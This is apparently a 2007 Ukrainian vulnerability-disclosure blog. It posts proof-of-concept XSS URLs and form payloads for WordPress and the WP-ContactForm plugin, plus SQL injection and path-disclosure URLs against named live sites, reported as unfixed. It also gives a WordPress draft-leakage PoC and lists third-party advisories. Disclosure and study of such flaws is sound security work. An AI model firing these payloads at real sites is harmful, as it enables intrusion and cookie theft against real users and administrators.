Websecurity - Веб безпека

Нещодавно, 07.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах plugins.php та plugin-editor.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/plugins.php?action=activate&plugin=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/plugins.php?action=deactivate&plugin='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/plugin-editor.php?newcontent=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=update&file=akismet/akismet.php

В минулому році я вже писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

28.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на сайтіі http://www.idevelopernetwork.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.12.2007

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

SQL DB Structure Extraction:

http://www.idevelopernetwork.com/resources/index.html?q=%27

SQL Injection:

http://www.idevelopernetwork.com/resources/index.html?q=%27%20OR%20LINKDESC%20LIKE%20%27

Дані уразливості досі не виправлені. Що дуже несерйозно.

Ще в минулому році, були оприлюднені SQL Injection та Full path disclosure уразливості в WordPress. Вразливі (до SQL ін’єкцій) версії WordPress 2.0.2 і 2.0.5.

• Sql Injection and Path Disclosoure Wordpress v2.0.5 (деталі)

SQL ін’єкції в файлі index.php (в 2.0.2 та 2.0.5). Більш нові версії WP невразливі до даних SQL Injection.

А ось зазначені Full path disclosure (49 дірок) актуальні й в самих останніх версіях движка - тобто в усіх версіях WordPress 2.x є подібні уразливості (в залежності від версії движка кількість вразливих файлів різниться). Тому що розробники движка досі не виправили і не планують виправляти ці дірки (я сам неодноразово звертав їхню увагу на Full path disclosure в WP, але вони вирішили їх не виправляти).

В даній добірці уразливості в веб додатках:

• PHP remote file inclusion vulnerability in Simple Invoices (деталі)
• SQL injection vulnerability in Noname Media Photo Galerie Standard (деталі)
• Multiple vulnerabilities in Zina (деталі)
• Multiple vulnerabilites in Nokia Intellisync Mobile Suite & Wireless Email Express (деталі)
• IBM Tivoli Provisioning Manager for OS Deployment TFTP Blocksize DoS Vulnerability (деталі)
• Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability (деталі)
• OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• SQL-ін’єкція в Powies PSCRIPT pMM (деталі)
• Updated kdelibs packages fix KHTML vulnerability (деталі)
• Multiple PHP remote file inclusion vulnerabilities in ExtCalThai (com_extcalendar) component for Mambo (деталі)
• PHP remote file inclusion vulnerability in JumbaCMS 0.0.1 (деталі)
• Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit (деталі)
• Міжсайтовий скриптінг та інклюдинг локальних файлів в Vikingboard (деталі)
• Відмова в обслуговуванні в ProFTPD (деталі)
• Oracle <= 9i / 10g File System Access via utl_file Exploit (деталі)

Два дні тому, 16.12.2007, була оприлюднена Information Leakage уразливість в WordPress. Вразлива версія WordPress 2.3.1 (і потенційно попередні версії).

PoC:

http://site/'wp-admin/

Уразливість в файлі query.php. Вона пов’язана з тим, що WP в деяких випадках перевіряє права користувача на огляд сайту (чи є даний користувач адміном) по URL. І якщо сформувати його відповідним чином (вставити в урл рядок “wp-admin/”), то можна отримати права адміна на огляд деякої інформації. Зокрема чорнеток - постів, що мають статус draft.

• Wordpress - Broken Access Control (деталі)

Я перевірив цю дірку в WP 2.0.x і вона не спрацювала. Можливо вона спрацює на більш нових версіях движка.

26.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://oboz.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення

Full path disclosure:

http://oboz.ua/cgi-bin/search.cgi?to=40-&from=21&id=539 (виправлена)

http://oboz.ua/cgi-bin/search.cgi?to=40&from=21-&id=539

http://oboz.ua/cgi-bin/search.cgi?to=40&from=21&id=539-

Дані уразливості (окрім одної) досі не виправлені.

У листопаді, 26.11.2007, я знайшов нові Cross-Site Scripting уразливості в плагіні WP-ContactForm. Причому це persistent XSS. Вразлива версія плагіна WP-ContactForm 1.5 alpha (та попередні).

Раніше я вже писав про уразливості в WP-ContactForm (в оригінальній версії) та в новій версії плагіна (зробленій іншим автором) - WP-ContactForm CAPTCHA bypass та XSS in WP-ContactForm. В новій версії плагіна були виправлені деякі дірки попередньої версії, деяки залишились та були додані нові дірки. Зараз розповім про уразливості в оригінальній версії плагіна.

XSS:

POST запит на сторінці http://site/wp-admin/admin.php? page=wp-contact-form/options-contactform.php:

"><script>alert(document.cookie)</script>В полях: E-mail Address, Subject - для атаки тільки на адміна.

<script>alert(document.cookie)</script>В полях: Success Message, Error Message - для атаки на користувачів.

</textarea><script>alert(document.cookie)</script>В полях: Success Message, Error Message - для атаки на адміна та на користувачів.

Розробнику плагіна я повідомлю найближчим часом.

P.S.

Також версія WP-ContactForm 1.5-alpha та попередні версії плагіна вразливі до Insufficient Anti-automation, тому що не мають капчі.

В даній добірці уразливості в веб додатках:

• GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities (деталі)
• GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities (деталі)
• SQL injection vulnerability in Mambo (деталі)
• PHP remote file inclusion vulnerability in Flipsource Flip (деталі)
• PHP remote file inclusion vulnerability in Categories hierarchy (aka CH or mod-CH) 2.1.2 (деталі)
• Directory traversal vulnerability in admin/subpages.php in GGCMS (деталі)
• Cross-site scripting (XSS) vulnerability in MediaWiki (деталі)
• Vulnerability in TorrentFlux 2.2 (деталі)
• Cross-site scripting (XSS) vulnerability in TorrentFlux 2.2 (деталі)
• Декілька уразливостей в chetcpasswd (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в Rapid Classified (деталі)
• PHP remote file inclusion vulnerability in osprey (деталі)
• PHP remote file inclusion vulnerability in Genepi (деталі)
• PHP remote file inclusion vulnerability in YapBB (деталі)
• Численні уразливості в IBM WebSphere Application Server (деталі)

В червні була оприлюднена Cross-Site Scripting уразливість в WordPress. Дірка в стандартній темі движка (в файлі functions.php).

XSS:

http://site/wp-admin/themes.php?page=functions.php&xss"><script>alert(document.cookie)</script>

Вразлива версія WordPress 2.2 (і потенційно попередні версії). Як я перевірив, дана уразливість може спрацювати в залежності від налаштувань PHP.

• Wordpress default theme XSS (admin) and other problems (деталі)

24.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.obozrevatel.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.12.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.